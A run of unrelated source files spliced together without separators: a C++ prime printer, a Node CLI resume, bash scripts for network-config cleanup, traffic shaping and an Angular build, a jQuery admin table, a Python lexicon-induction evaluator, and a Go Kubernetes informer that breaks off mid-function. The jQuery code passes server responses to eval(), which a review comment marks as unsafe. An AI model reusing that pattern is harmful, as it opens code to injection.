    // search at sqrt(n) without floating-point arithmetic
    for (int i = 5; i * i <= n; i = i + 6)
        if (n % i == 0 || n % (i + 2) == 0)
            return false;

    return true;
}

// Print every prime in [low, high], one per line.
int main()
{
    int low = 100;
    int high = 500;

    for (int i = low; i <= high; i++)
        if (isPrime(i))
            cout << i << '\n'; // '\n' instead of endl: avoids flushing the stream on every line

    return 0;
}
#!/usr/bin/env node
// CLI resume: each flag prints one section of the resume using the
// corresponding logger and the JSON data under ../assets.

const program = require('commander');

const AboutMeLogger = require('./loggers/AboutMeLogger.js');
const ExperienceLogger = require('./loggers/ExperienceLogger.js');
const EducationLogger = require('./loggers/EducationLogger.js');

program
    .name('joeltankam')
    .option('-m, --about-me', 'output information about me 👨🏽‍💼')
    .option('-e, --experience', 'output my professional experience 💻')
    .option('-d, --education', 'output my education 👨‍🎓')
    .option('-s, --skills', 'output my skill highlights 👨‍💻')
    .option('-c, --awards', 'output my awards and certifications 🏆')
    .option('-l, --languages', 'output my language skills 🌍')
    .option('-r, --references', 'output my references 👨‍⚖️')
    .option('-o, --hobbies', 'output my hobbies 🕺')
    .option('-a, --all', 'output everything ⚛');

program.parse(process.argv);

// The summary is always printed; the flag only toggles the expanded
// "about me" output inside the logger.
const summaryData = require('../assets/about.json');
new AboutMeLogger(summaryData, program.aboutMe || program.all).log();

if (program.experience || program.all) {
    console.log(); // blank separator line before the section
    const experienceData = require('../assets/experience.json');
    new ExperienceLogger(experienceData).log();
}

// FIX: the unconditional `console.log()` calls that used to sit between
// the sections printed stray blank lines even when no section was
// requested (e.g. before the help output); separators are now emitted
// only inside the section blocks.

if (program.education || program.all) {
    console.log();
    const educationData = require('../assets/education.json');
    new EducationLogger(educationData).log();
}

// TODO: --skills, --awards, --languages, --references and --hobbies are
// declared above but have no handlers yet.

// With no arguments at all, show usage instead of printing only the summary.
if (!process.argv.slice(2).length) {
    program.outputHelp();
}
#!/usr/bin/env bash # # Remove network configuration # # CentOS 7 is setting the MAC address as HWADDR parameter in the network # configuration files (/etc/sysconfig/network-scripts/ifcfg-e*) # [ifcfg-enp0s31f6, ifcfg-eth0] # These files can be removed, because default config are regenarted if necessary. set -o errexit network_config_locations=( "/etc/sysconfig/network-scripts/ifcfg-e*" ) netplan_networkd_config="/etc/netplan/01-netcfg.yaml" netplan_networkmanager_config="/etc/netplan/01-network-manager-all.yaml" # network: Remove network-scripts/ifcfg-e* config files # * /etc/sysconfig/network-scripts/ifcfg-e* echo "*** Remove network-scripts/ifcfg-e* config files" # Include hidden files in glob shopt -s nullglob # shellcheck disable=SC2068 for network_config in ${network_config_locations[@]}; do rm "${network_config}" done # This needs to be executed on the Ubuntu server installation (mini.iso) when installing Desktop environment using # `tasksel tasksel/first multiselect ubuntu-desktop` # By default Ubuntu server installation (mini.iso) creates the `/etc/netplan/01-netcfg.yaml` and installing ubuntu-desktop using tasksel # adds `/etc/netplan/01-network-manager-all.yaml`. Having both these files for Ubuntu Desktop brings problems. # Some details can be found here: https://github.com/hashicorp/vagrant/issues/11378 # In short the `/etc/netplan/01-netcfg.yaml` should not be present on the Ubuntu Desktop installation. # `/etc/netplan/01-network-manager-all.yaml` should be used for NetworkManager configuration (only) echo "*** Remove /etc/netplan/01-netcfg.yaml in Ubuntu Desktop" if [[ -s "${netplan_networkd_config}" ]] && [[ -s "${netplan_networkmanager_config}" ]]; then rm "${netplan_networkd_config}" fi exit 0
<reponame>JSandME/ICS
// Admin "permission" management page: renders an editable bootstrap-table
// backed by the rest/adminPermission/* endpoints, plus the modal helpers
// (editRow/save/newPermission) and row deletion wired from the table's
// action links.
$(function() {
    var Permission = function() {
        // Configure and populate the #reportTable bootstrap-table.
        var handlePermissionTable = function() {
            $(function() {
                var url = "rest/adminPermission/getDate";
                $("#reportTable").bootstrapTable({
                    url : url,
                    dataType:"JSON", // server returns JSON
                    idField : "id",
                    toolbar: '#toolbar', // container element for toolbar buttons
                    striped: true, // zebra-stripe the rows
                    cache: false, // disable caching (bootstrap-table defaults to true)
                    pagination: true, // show pagination controls
                    sortable: false, // sorting disabled
                    sortOrder: "asc", // default sort direction
                    pageNumber:1, // start on the first page
                    pageSize: 10, // rows per page
                    pageList : [10, 25, 50, 100, 1000],
                    showRefresh : true, // show the refresh button
                    search : true,
                    singleSelect : true,
                    clickToSelect : true,
                    showExport: false, // export button hidden
                    exportDataType: "all", // 'basic', 'all', 'selected'
                    minimumCountColumns: 2, // minimum number of visible columns
                    responseHandler: responseHandler,
                    //sidePagination: "server", // server-side paging (disabled)
                    queryParams : function(param) {
                        return {};
                    },
                    columns : [ {
                        checkbox : true
                    }, {
                        field : "permissionName",
                        title : "权限名",
                        editable : {
                            type : 'text',
                            title : '权限名',
                            validate : function(v) {
                                if (!v)
                                    return '权限名不能为空';
                            }
                        }
                    }, {
                        field : "permissionSign",
                        title : "权限标识",
                        editable : {
                            type : 'select',
                            title : '权限标识',
                            // Synchronously fetch the selectable permission keys.
                            source : function(){
                                var result = [];
                                $.ajax({
                                    type : "GET",
                                    async: false, // x-editable needs the list before rendering
                                    cache : true,
                                    url : "rest/adminPermission/getPermissionName",
                                    data : {},
                                    // NOTE(review): 'dateType' is presumably a typo
                                    // for jQuery's 'dataType' option — confirm; as
                                    // written the option is ignored by $.ajax.
                                    dateType : 'JSON',
                                    success : function(data, status){
                                        // NOTE(review): eval() on a server response is
                                        // unsafe if the response is not fully trusted;
                                        // JSON.parse would be the safe equivalent.
                                        $.each(eval(data), function(index, element){
                                            result.push({value : element.key, text : element.key});
                                        });
                                    }
                                });
                                return result;
                            }
                        }
                    }, {
                        field : "description",
                        title : "权限描述",
                        editable : {
                            type : 'text',
                            title : '权限描述',
                            validate : function(v) {
                                if (!v)
                                    return '角色描述不能为空';
                            }
                        }
                    }, {
                        // Per-row edit/delete action links; they call the global
                        // editRow/delRow functions defined below.
                        title: '操作',
                        field: 'id',
                        align: 'center',
                        formatter:function(value,row,index){
                            var e = '<a href="#" mce_href="#" onclick="editRow(\''+ row.id + '\')">编辑</a> ';
                            var d = '<a href="#" mce_href="#" onclick="delRow(\''+ row.id + '\');$(\'.rerefresh\').click()">删除</a> ';
                            return e+d;
                        }
                    }],
                    // Persist an inline (x-editable) cell edit to the server.
                    onEditableSave : function(field, row, oldValue, $el) {
                        $("#reportTable").bootstrapTable("resetView");
                        $.ajax({
                            type : "post",
                            url : "rest/adminPermission/updatePermission",
                            data : row,
                            dataType : 'JSON',
                            success : function(data, status) {
                                if(status == "success"){
                                    alert("更新成功。");
                                    $('#reportTable').bootstrapTable('refresh');
                                }
                            },
                            error : function(data, status) {
                                alert(status);
                                alert("更新失败。");
                            },
                            complete : function() {
                            }
                        });
                    }
                });
                $("#reportTable tr th").css("background-color", "#ddd"); // header background color
                $("#reportTable tr th").css("color", "#000000"); // header text color
                $("#reportTable tr th").css("font-family", "#Microsoft Yahei"); // header font
                //alert($("#fixed-table-toolbar").html());
                /*$(".fixed-table-toolbar").append(
                        '<div style="padding-top:10px">'+//
                        '<a href="javascript:void(0)" onclick="" class="btn btn-info col-sm-1">新增</a>'+
                '</div>');*/
                // Hook to massage the server response before the table consumes
                // it; currently a pass-through.
                function responseHandler(res) {
                    //alert(JSON.stringify(res));
                    //var rows=res.rows;
                    return res;
                }
                // Populate the #permissioSign <select> with the permission keys.
                $.ajax({
                    type : "GET",
                    async: true,
                    cache : true,
                    url : "rest/adminPermission/getPermissionName",
                    data : {},
                    dateType : 'JSON', // NOTE(review): likely a 'dataType' typo, see above
                    success : function(data, status){
                        $.each(eval(data), function(index, element){
                            $('#permissioSign').append("<option value='" + element.key + "'>" + element.key + "</option>");
                        });
                    }
                });
                // Enable the #remove button only while at least one row is selected.
                $('#reportTable').on('check.bs.table uncheck.bs.table ' +
                        'check-all.bs.table uncheck-all.bs.table', function () {
                    $('#remove').prop('disabled', !$('#reportTable').bootstrapTable('getSelections').length);
                    // save your data, here just save the current page
                    // NOTE(review): `selections` is assigned without var/let and
                    // becomes an implicit global — confirm this is intended.
                    selections = getIdSelections();
                    // push or splice the selections if you want to save all data selections
                });
                $('#remove').click(function () {
                    var ids = getIdSelections();
                    /*$('#reportTable').bootstrapTable('remove', {
                        field: 'id',
                        values: ids
                    });*/
                    $('#remove').prop('disabled', true);
                });
            });
        };
        return {
            init : function() {
                handlePermissionTable();
            }
        };
    }();
    Permission.init();
});

// Delete the permission with the given id (synchronous POST), then
// refresh the table on success.
function delRow(id){
    $.ajax({
        type : 'post',
        url : "rest/adminPermission/deletePermission",
        async : false,
        data : { id : id},
        cache : false,
        success : function(data ,status){
            alert("删除成功。");
            $('#reportTable').bootstrapTable('refresh');
        },
        error : function(data, status) {
            alert("删除失败。");
        },
    });
}

// Load one permission into the edit modal (#light/#fade overlay).
function editRow(id){
    $.ajax({
        type : 'post',
        url : "rest/adminPermission/getPermission",
        async : true,
        data : { id : id},
        cache : false,
        success : function(data ,status){
            $('#id').val(data.id);
            $('#permissionName').val(data.permissionName);
            $('#permissionSign').val(data.permissionSign);
            $('#description').val(data.description);
        }
    });
    $('#light').css("display","block");
    $('#fade').css("display","block");
}

// Validate the modal fields and persist the edited permission.
function save(){
    var id = $('#id').val();
    var permissionName = $('#permissionName').val();
    var permissionSign = $('#permissionSign').val();
    var description = $('#description').val();
    if(permissionName == "" || permissionSign == ""){
        alert("权限名和权限标签不能为空。");
        return ;
    }
    $.ajax({
        type : 'post',
        url : "rest/adminPermission/updatePermission",
        async : true,
        data : {id:id, permissionName:permissionName,permissionSign:permissionSign,description:description},
        cache : false,
        success : function(data ,status){
            $('#light').css("display","none");
            $('#fade').css("display","none");
            alert("保存成功。");
            $('#reportTable').bootstrapTable('refresh');
        },
        error : function(data, status) {
            alert("保存失败。");
        },
    });
}

// Clear the modal fields and open it for creating a new permission.
function newPermission(){
    $('#id').val("");
    $('#permissionName').val("");
    // NOTE(review): '#permissioSign' differs from the '#permissionSign'
    // selector used in editRow/save — confirm which id exists in the markup.
    $('#permissioSign').val("");
    $('#description').val("");
    $('#light').css("display","block");
    $('#fade').css("display","block");
}

// Return the ids of the currently selected table rows.
function getIdSelections() {
    return $.map($('#reportTable').bootstrapTable('getSelections'), function (row) {
        return row.id;
    });
}
#!/usr/bin/env bash
# Shape outbound traffic on ${IF}: protocol traffic on port 9999 leaving the
# local network is capped at ${LIMIT}; everything else keeps full link speed.
# Uses an HTB qdisc plus iptables fwmarks to classify packets.
# Must be run as root. (No `set -e` on purpose: the initial `tc qdisc del`
# fails harmlessly when no qdisc exists yet.)

#network interface on which to limit traffic
IF="eth0"
#limit of the network interface in question
LINKCEIL="1gbit"
#limit outbound Reden protocol traffic to this rate
LIMIT="160kbit"
#defines the address space for which you wish to disable rate limiting
LOCALNET="192.168.0.0/16"

#delete existing rules (fails harmlessly when none exist)
tc qdisc del dev ${IF} root

#add root class
tc qdisc add dev ${IF} root handle 1: htb default 10

#add parent class
tc class add dev ${IF} parent 1: classid 1:1 htb rate ${LINKCEIL} ceil ${LINKCEIL}

#add our two classes. one unlimited, another limited
tc class add dev ${IF} parent 1:1 classid 1:10 htb rate ${LINKCEIL} ceil ${LINKCEIL} prio 0
tc class add dev ${IF} parent 1:1 classid 1:11 htb rate ${LIMIT} ceil ${LIMIT} prio 1

#add handles to our classes so packets marked with <x> go into the class with "... handle <x> fw ..."
tc filter add dev ${IF} parent 1: protocol ip prio 1 handle 1 fw classid 1:10
tc filter add dev ${IF} parent 1: protocol ip prio 2 handle 2 fw classid 1:11

#delete any existing rules
#disable for now
#ret=0
#while [ $ret -eq 0 ]; do
#	iptables -t mangle -D OUTPUT 1
#	ret=$?
#done

#limit outgoing traffic to and from port 9999. but not when dealing with a host on the local network
#  (defined by $LOCALNET)
#  --set-mark marks packages matching these criteria with the number "2"
#  these packages are filtered by the tc filter with "handle 2"
#  this filter sends the packages into the 1:11 class, and this class is limited to ${LIMIT}
iptables -t mangle -A OUTPUT -p tcp -m tcp --dport 9999 ! -d ${LOCALNET} -j MARK --set-mark 0x2
iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 9999 ! -d ${LOCALNET} -j MARK --set-mark 0x2
We can detect whether a given list of numbers contains duplicate elements by using a hash set. Loop through the list, adding each element to the hash set; if an element is already present in the hash set when we try to add it, that element is a duplicate and can be reported.
#!/usr/bin/env bash
# Build the Angular package distribution: compile with ngc, bundle with
# rollup, then assemble the publishable ./dist directory.

# FIX: abort on the first failing step so a broken compile never produces
# (or silently republishes) a stale dist.
set -e

# Clean up previous distributions
rm -rf dist build

# Command lines for the locally installed Angular compiler and rollup
NGC="node node_modules/.bin/ngc"
ROLLUP="node node_modules/.bin/rollup"

# Run Angular Compiler
$NGC -p src/tsconfig-build.json

# Bundle the compiled output
$ROLLUP -c

# Copy build artifacts into dist, excluding intermediate .js files that
# rollup already bundled, and add the package manifest.
rsync -a --exclude=*.js build/ dist
cp src/package.json dist/package.json
"""Evaluation of cross-lingual embedding methods on the BLI task.

BLI (bilingual lexicon induction): for each source word in a test
dictionary, rank all target-language words by cosine similarity of the
projected embeddings and measure where the gold translation lands.
"""
import os
import sys

import numpy as np

# Make the sibling modules importable when this file is run as a script.
sys.path.append(os.path.dirname(os.path.abspath(__file__)))

from utils import normalize_matrix
from load_monolingual import load_translation_dict


class Evaluator:
    """Evaluate a cross-lingual embedding method on the BLI task.

    Attributes:
        test_translation_source (list): Source-language test words.
        test_translation_target (list): Gold target-language translations.
        CrossLingualModel: Fitted model under evaluation (e.g. VecMap).
            Assumed to expose ``proj_embedding_source_target``,
            ``norm_trg_embedding_matrix``, ``src_word2ind``,
            ``trg_word2ind`` and ``trg_ind2word``.
    """

    # NOTE: the attributes used to be mutable class-level defaults
    # (``test_translation_source = []`` etc.); they are now set only in
    # __init__, which avoids accidental sharing between instances.

    def __init__(self, CrossLingualModel, test_translation_dict_path):
        """Initialize with a fitted model and a test dictionary.

        Args:
            CrossLingualModel: Fitted cross-lingual model to evaluate.
            test_translation_dict_path: Path to the test translation
                dictionary file.
        """
        # Built Test Translation Dictionary
        self.test_translation_source, self.test_translation_target = load_translation_dict(
            test_translation_dict_path)
        # Select CrossLingualModel to test
        self.CrossLingualModel = CrossLingualModel

    def evaluation_on_BLI(self, verbose=0):
        """Run the BLI evaluation over the test dictionary.

        Pairs for which either word is out of vocabulary are skipped.
        Prints P@1, P@5, P@10 and MRR as before, and additionally returns
        them so callers no longer have to parse stdout.

        Args:
            verbose: Set to 1 to print the top-3 predictions for the
                first few test words.

        Returns:
            dict with keys ``p1``, ``p5``, ``p10``, ``mrr`` and
            ``num_pairs``, or None when no test pair was found in both
            vocabularies.
        """
        ranking = []
        iteration = 0
        norm_proj_src_emb = normalize_matrix(self.CrossLingualModel.proj_embedding_source_target)
        for test_src_word, test_trg_word in zip(self.test_translation_source, self.test_translation_target):
            # -1 marks an out-of-vocabulary word on either side.
            source_index = self.CrossLingualModel.src_word2ind.get(test_src_word, -1)
            target_index = self.CrossLingualModel.trg_word2ind.get(test_trg_word, -1)
            if source_index == -1 or target_index == -1:
                continue

            # Cosine similarity of the (already normalized) projected source
            # embedding against every normalized target embedding.
            norm_proj_src_word_emb = norm_proj_src_emb[[source_index]]
            similarity_cos = np.dot(norm_proj_src_word_emb,
                                    np.transpose(self.CrossLingualModel.norm_trg_embedding_matrix))

            # Rank target words by descending similarity; the gold
            # translation's 1-based position is its rank.
            most_similar_trg_index = np.argsort(-similarity_cos[[0]])
            find_rank = np.where(most_similar_trg_index == target_index)[1][0] + 1
            ranking.append(find_rank)

            if iteration <= 5 and verbose:
                print("\nTest translation: {} -> {}".format(
                    test_src_word, self.CrossLingualModel.trg_ind2word[target_index]))
                print("Predicted Top 3 Translations: {}, {}, {}".format(
                    self.CrossLingualModel.trg_ind2word[most_similar_trg_index[0, 0]],
                    self.CrossLingualModel.trg_ind2word[most_similar_trg_index[0, 1]],
                    self.CrossLingualModel.trg_ind2word[most_similar_trg_index[0, 2]]))
            iteration += 1

        if not ranking:
            print("NO MATCHING FOUND!")
            return None

        print("\n\nNumber of Test Translations: {}/{}".format(len(ranking), len(self.test_translation_source)))
        p1 = len([p for p in ranking if p <= 1]) / len(ranking)
        p5 = len([p for p in ranking if p <= 5]) / len(ranking)
        p10 = len([p for p in ranking if p <= 10]) / len(ranking)
        print("P@1: {}".format(p1))
        print("P@5: {}".format(p5))
        print("P@10: {}".format(p10))
        mrr = sum([1.0 / p for p in ranking]) / len(ranking)
        print("\n\nMRR: {}".format(mrr))
        return {"p1": p1, "p5": p5, "p10": p10, "mrr": mrr, "num_pairs": len(ranking)}
<reponame>briankim31415/CirQuick
"use strict";
/* tslint:disable */
/* eslint-disable */
/**
 * cirquick
 * Backend for Cirquick
 *
 * OpenAPI spec version: 1.0.0
 *
 *
 * NOTE: This class is auto generated by the swagger code generator program.
 * https://github.com/swagger-api/swagger-codegen.git
 * Do not edit the class manually.
 */
// Compiled CommonJS module stub: the __esModule marker lets transpiled
// `import` statements interop with this module. Nothing else is exported.
Object.defineProperty(exports, "__esModule", { value: true });
// Copyright 2018-2019 VMware, Inc.
// SPDX-License-Identifier: Apache-2.0

// Package kubecluster watches Kubernetes objects via informers and feeds
// the observed events into a processing queue.
package kubecluster

import (
	"encoding/json"
	"fmt"
	"strings"
	"time"

	"github.com/golang/glog"
	"github.com/vmware-tanzu/watch-proxy/config"
	apps_v1 "k8s.io/api/apps/v1"
	core_v1 "k8s.io/api/core/v1"
	networking_v1beta1 "k8s.io/api/networking/v1beta1"
	"k8s.io/apimachinery/pkg/fields"
	"k8s.io/apimachinery/pkg/runtime"
	"k8s.io/client-go/kubernetes"
	lister_apps_v1 "k8s.io/client-go/listers/apps/v1"
	lister_core_v1 "k8s.io/client-go/listers/core/v1"
	lister_networking_v1beta1 "k8s.io/client-go/listers/networking/v1beta1"
	"k8s.io/client-go/rest"
	"k8s.io/client-go/tools/cache"
	"k8s.io/client-go/util/workqueue"
)

// Event-type keys attached to queued items.
const (
	addKey    = "add"
	updateKey = "update"
	DeleteKey = "delete"
)

// Listers which hold cached k8s objects for later lookup
var (
	NsLister     lister_core_v1.NamespaceLister
	PoLister     lister_core_v1.PodLister
	NoLister     lister_core_v1.NodeLister
	CmLister     lister_core_v1.ConfigMapLister
	SvcLister    lister_core_v1.ServiceLister
	SecretLister lister_core_v1.SecretLister
	DeployLister lister_apps_v1.DeploymentLister
	RsLister     lister_apps_v1.ReplicaSetLister
	IngLister    lister_networking_v1beta1.IngressLister
)

// Informer is capable of starting and stopping a running informer.
type Informer interface {
	Start()
	Stop()
}

// InformerClient contains configuration for instantiating an informer. Use NewInformerClient to
// ensure valid configuration is provided.
type InformerClient struct {
	client           *kubernetes.Clientset // k8s API client set the informer is built from
	rest             *rest.Interface       // REST client for the watched resource type
	resource         string                // watched resource type, e.g. "pods" or "deployments"
	ignoreNamespaces []string              // namespaces whose events are skipped (from config)
	k8sObjectType    runtime.Object        // runtime object corresponding to `resource`
	resyncTime       time.Duration         // periodic re-upload interval (0 disables; from ForceReuploadDuration)
	processQueue     workqueue.RateLimitingInterface // queue receiving all observed events
	done             chan bool             // signaled to stop the running informer (see Start)
	allowAddEvent    bool
	skipAddEventTime time.Duration // startup delay before add events are processed (from DelayStartSeconds)
	clusterName      string        // cluster name attached to emitted objects (from config)
}

// InformerClients is a wrapper around []*InformerClient so that helper methods
// (e.g. finding an InformerClient in the list by resource) can be added.
type InformerClients []*InformerClient

// NewInformerClient returns an InformerClient capable of starting an informer
// to watch all events of a specific k8s object type. It returns an error when
// the requested object type (specified in the resource argument) is not known
// to watch-proxy. The arguments it takes are as follows.
//
//   - client: kubernetes.Clientset used for generating REST clients capable of
//     communicating with kubernetes
//   - resource: the type of k8s object the informer will watch for events on.
//     e.g. pods, deployments, or namespaces
//   - nsSelector: scopes the informer to only watch objects in a specific
//     namespace. An empty string represents all namespaces.
//     NOTE(review): nsSelector is currently ignored — it is neither stored on
//     the returned client nor passed to the ListWatch (Start hard-codes "").
//     Confirm whether per-namespace scoping was ever wired up.
//   - pQueue: processor queue where all events should be dropped for future
//     processing.
func NewInformerClient(client *kubernetes.Clientset, resource string, nsSelector string, pQueue workqueue.RateLimitingInterface, config config.Config) (*InformerClient, error) {
	// Resolve the REST client and object type for the requested resource; an
	// unknown resource is the only hard failure in this constructor.
	r, obj, err := getRuntimeObjectConfig(client, resource)
	if err != nil {
		return nil, err
	}

	// An unparsable delay is downgraded to "no delay" with a warning rather
	// than failing construction.
	delay, err := time.ParseDuration(config.DelayStartSeconds)
	if err != nil {
		delay = 0 * time.Second
		glog.Warningf("%s: no valid delayAddEventDuration, watch-proxy will process all events without delay. error: %s. "+
			"no delay will be applied.", resource, err.Error())
	}

	// Likewise an unparsable resync duration disables periodic re-upload.
	resyncDuration, err := time.ParseDuration(config.ForceReuploadDuration)
	if err != nil {
		resyncDuration = 0 * time.Second
		glog.Warningf("%s: no valid forceReuploadDuration set, watch-proxy will not attempt to periodically re-upload"+
			" all kubernetes objects.", resource)
	}

	doneChannel := make(chan bool)
	ic := &InformerClient{
		rest:             r,
		ignoreNamespaces: config.IgnoreNamespaces,
		k8sObjectType:    obj,
		resource:         resource,
		resyncTime:       resyncDuration,
		processQueue:     pQueue,
		done:             doneChannel,
		skipAddEventTime: delay,
		clusterName:      config.ClusterName,
	}
	return ic, nil
}

// configureUID takes a kubernetes object and traverses the metadata field to
// locate the value of the UID. If no UID is found or the metadata is
// non-existent, an empty string is returned.
// NOTE(review): an earlier version of this comment claimed the function "adds
// the field metadata.uniqueID to the object to be emitted", but no such write
// happens below — the function is read-only.
func configureUID(obj interface{}) string {
	// TODO(joshrosso): There has to be a better way to do this than marshaling
	// in and out of JSON.
	b, err := json.Marshal(obj)
	if err != nil {
		return ""
	}
	var k8sObj map[string]interface{}
	err = json.Unmarshal(b, &k8sObj)
	if err != nil {
		return ""
	}
	metadata, ok := k8sObj["metadata"]
	if !ok {
		glog.Errorf("Failed to locate metadata.uid used for emitting object.")
		return ""
	}
	// NOTE(review): unchecked assertion — would panic if "metadata" were
	// present but not a JSON object; JSON round-tripped k8s objects always
	// have a map here, so left as-is.
	return fmt.Sprintf("%s", metadata.(map[string]interface{})["uid"])
}

// Start instantiates an informer and begins the watch for resource events. The
// informer's resulting controller is run in its own go routine and Start will
// block until a signal is sent to the InformerClient's done channel. Upon that
// signal, the controller's go routine is stopped and Start will return.
func (ic InformerClient) Start() {
	// Optionally suppress add events for a start-up window; the timer
	// goroutine flips allowAddEvent once the window elapses.
	// NOTE(review): allowAddEvent is written by the timer goroutine and read
	// by informer callbacks without synchronization — flagged by `go test
	// -race`. Confirm whether this is acceptable here.
	if ic.skipAddEventTime > 0*time.Second {
		go ic.startSkipAddEventTimer()
	} else {
		ic.allowAddEvent = true
	}

	// watcher and lister configuration for informer. The namespace is
	// hard-coded to "" (all namespaces); filtering happens per-event via
	// ignoreNamespace instead.
	watchlist := cache.NewListWatchFromClient(*ic.rest, ic.resource, "", fields.Everything())

	// eventhandlers describing what to do upon add, update, and delete events.
	// Queued items are pipe-delimited strings:
	//   add/update: "<event>|<cluster>-<uid>|<resource>|<ns/name>|x"
	//   delete:     "<event>|<cluster>-<uid>|<resource>|<ns/name>|<json>"
	eHandlers := cache.ResourceEventHandlerFuncs{
		AddFunc: func(obj interface{}) {
			if !ic.ignoreNamespace(obj) {
				if !ic.addEventAllowed() {
					glog.Infof("skipping add for %s. start delay in effect", configureUID(obj))
					return
				}
				if key, err := cache.MetaNamespaceKeyFunc(obj); err == nil {
					ic.processQueue.AddRateLimited(fmt.Sprintf("%s|%s|%s|%s|x", addKey, ic.clusterName+"-"+configureUID(obj), ic.resource, key))
				}
			}
		},
		UpdateFunc: func(oldObj, newObj interface{}) {
			if !ic.ignoreNamespace(newObj) {
				if key, err := cache.MetaNamespaceKeyFunc(newObj); err == nil {
					ic.processQueue.AddRateLimited(fmt.Sprintf("%s|%s|%s|%s|x", updateKey, ic.clusterName+"-"+configureUID(newObj), ic.resource, key))
				}
			}
		},
		DeleteFunc: func(obj interface{}) {
			if !ic.ignoreNamespace(obj) {
				if key, err := cache.DeletionHandlingMetaNamespaceKeyFunc(obj); err == nil {
					// A deleted object is no longer retrievable from the
					// cache, so its full JSON is carried on the queue item.
					mObj, err := json.Marshal(obj)
					if err != nil {
						glog.Errorf("failed to marshal deleted object: %s", err)
					}
					ic.processQueue.AddRateLimited(fmt.Sprintf("%s|%s|%s|%s|%s", DeleteKey, ic.clusterName+"-"+configureUID(obj), ic.resource, key, mObj))
				}
			}
		},
	}

	// informer creation, returning indexer used in lister generation and
	// controller capable of starting event watches.
	indexer, controller := cache.NewIndexerInformer(watchlist, ic.k8sObjectType, ic.resyncTime, eHandlers, cache.Indexers{})

	// attempt to create globally accessible listers that can be used to lookup
	// k8s objects that events had previously fired for.
	err := initLister(indexer, ic.k8sObjectType)
	if err != nil {
		glog.Errorln(err.Error())
		return
	}

	// run the controller and block until a stop signal is received via the
	// ic.done channel. Upon receiving the signal, stop the controller and
	// return from this function.
	stop := make(chan struct{})
	go controller.Run(stop)
	glog.Infof("informer is active for resource: %s", ic.resource)
	<-ic.done
	close(stop)
	glog.Infof("informer has been stopped for resource: %s", ic.resource)
}

// Stop tells the InformerClient's controller (watcher, indexer, etc) to stop.
// It blocks until Start consumes the signal from the done channel.
func (ic InformerClient) Stop() {
	ic.done <- true
}

// FindInformerClient looks up an InformerClient responsible for handling the
// passed resource. It returns nil (after logging an error) when none matches.
func (ics InformerClients) FindInformerClient(resource string) *InformerClient {
	for _, ic := range ics {
		if ic.resource == resource {
			return ic
		}
	}
	glog.Errorf("Expected to find existing informer client for resource %s. Found nothing.", resource)
	return nil
}

// RemoveInformerClient returns a new InformerClients slice with the passed
// removeIc (InformerClient) removed from the list.
// NOTE(review): this mutates the slice while ranging over it. Because pointer
// equality can match at most one element the loop happens to work, but a
// break after the append (or filtering into a fresh slice) would be safer.
func RemoveInformerClient(ics InformerClients, removeIc *InformerClient) InformerClients {
	for i, ic := range ics {
		if ic == removeIc {
			ics = append(ics[:i], ics[i+1:]...)
		}
	}
	return ics
}

// getRuntimeObjectConfig returns the appropriate rest client and runtime object type based on the
// resource argument. the kubernetes.Clientset argument is used to construct the rest client.
func getRuntimeObjectConfig(client *kubernetes.Clientset, resource string) (*rest.Interface, runtime.Object, error) { var rest rest.Interface var obj runtime.Object switch resource { case "namespaces": rest = client.CoreV1().RESTClient() obj = &core_v1.Namespace{} case "pods": rest = client.CoreV1().RESTClient() obj = &core_v1.Pod{} case "nodes": rest = client.CoreV1().RESTClient() obj = &core_v1.Node{} case "configmaps": rest = client.CoreV1().RESTClient() obj = &core_v1.ConfigMap{} case "secrets": rest = client.CoreV1().RESTClient() obj = &core_v1.Secret{} case "services": rest = client.CoreV1().RESTClient() obj = &core_v1.Service{} case "ingresses": rest = client.NetworkingV1beta1().RESTClient() obj = &networking_v1beta1.Ingress{} case "deployments": rest = client.AppsV1().RESTClient() obj = &apps_v1.Deployment{} case "replicasets": rest = client.AppsV1().RESTClient() obj = &apps_v1.ReplicaSet{} default: return nil, nil, fmt.Errorf("object type requested is not recognized. type: %s", resource) } return &rest, obj, nil } // initLister initializes a globally accessible k8s object lister based objType passed. objType // should be one of runtime.Object. The indexer argument must be the indexer that's returned upon // generating an informer; a step that is done when calling Informer.Start(). This globally // accessible lister is used by the processor package to lookup, via cache, objects that may // eventually be emitted. 
func initLister(i cache.Indexer, objType interface{}) error {
	// Each case assigns one of the package-level listers declared above; only
	// the lister matching objType is (re)initialized per call.
	switch t := objType.(type) {
	case *core_v1.Namespace:
		NsLister = lister_core_v1.NewNamespaceLister(i)
	case *core_v1.Pod:
		PoLister = lister_core_v1.NewPodLister(i)
	case *core_v1.Node:
		NoLister = lister_core_v1.NewNodeLister(i)
	case *core_v1.ConfigMap:
		CmLister = lister_core_v1.NewConfigMapLister(i)
	case *core_v1.Service:
		SvcLister = lister_core_v1.NewServiceLister(i)
	case *networking_v1beta1.Ingress:
		IngLister = lister_networking_v1beta1.NewIngressLister(i)
	case *core_v1.Secret:
		SecretLister = lister_core_v1.NewSecretLister(i)
	case *apps_v1.Deployment:
		DeployLister = lister_apps_v1.NewDeploymentLister(i)
	case *apps_v1.ReplicaSet:
		RsLister = lister_apps_v1.NewReplicaSetLister(i)
	default:
		// NOTE(review): %s prints the value, not its type; %T would be the
		// conventional verb for this message.
		return fmt.Errorf("Failed to init lister due to inability to infer type. Type was %s", t)
	}
	return nil
}

// addEventAllowed checks for whether the add event should be skipped. This is
// based on a timer that is set when a skipAddEventTime is set.
func (ic InformerClient) addEventAllowed() bool {
	return ic.allowAddEvent
}

// ignoreNamespace checks to see if the object's namespace is being ignored.
// It returns true when the object's namespace is in the ignore list and false
// otherwise. Any failure to introspect the object is logged and treated as
// "not ignored" so events are passed through rather than crashing the watch.
func (ic InformerClient) ignoreNamespace(obj interface{}) bool {
	// Round-trip through JSON to reach metadata without knowing the concrete
	// object type (same approach as configureUID).
	b, err := json.Marshal(obj)
	if err != nil {
		glog.Errorf("Failed to marshal object json: %s", err)
		return false
	}
	var k8sObj map[string]interface{}
	if err := json.Unmarshal(b, &k8sObj); err != nil {
		glog.Errorf("Failed to unmarshal K8s object json: %s", err)
		return false
	}

	// Guarded type assertions: the previous implementation asserted
	// metadata.(map[string]interface{}) even after detecting that metadata was
	// missing, which panicked on a nil interface; it also fell through after
	// marshal/unmarshal errors into the same panic.
	metadata, ok := k8sObj["metadata"].(map[string]interface{})
	if !ok {
		glog.Errorf("Failed to identify namespace: object has no metadata")
		return false
	}
	selfLink, ok := metadata["selfLink"].(string)
	if !ok {
		glog.Errorf("Failed to identify namespace: metadata.selfLink missing or not a string")
		return false
	}

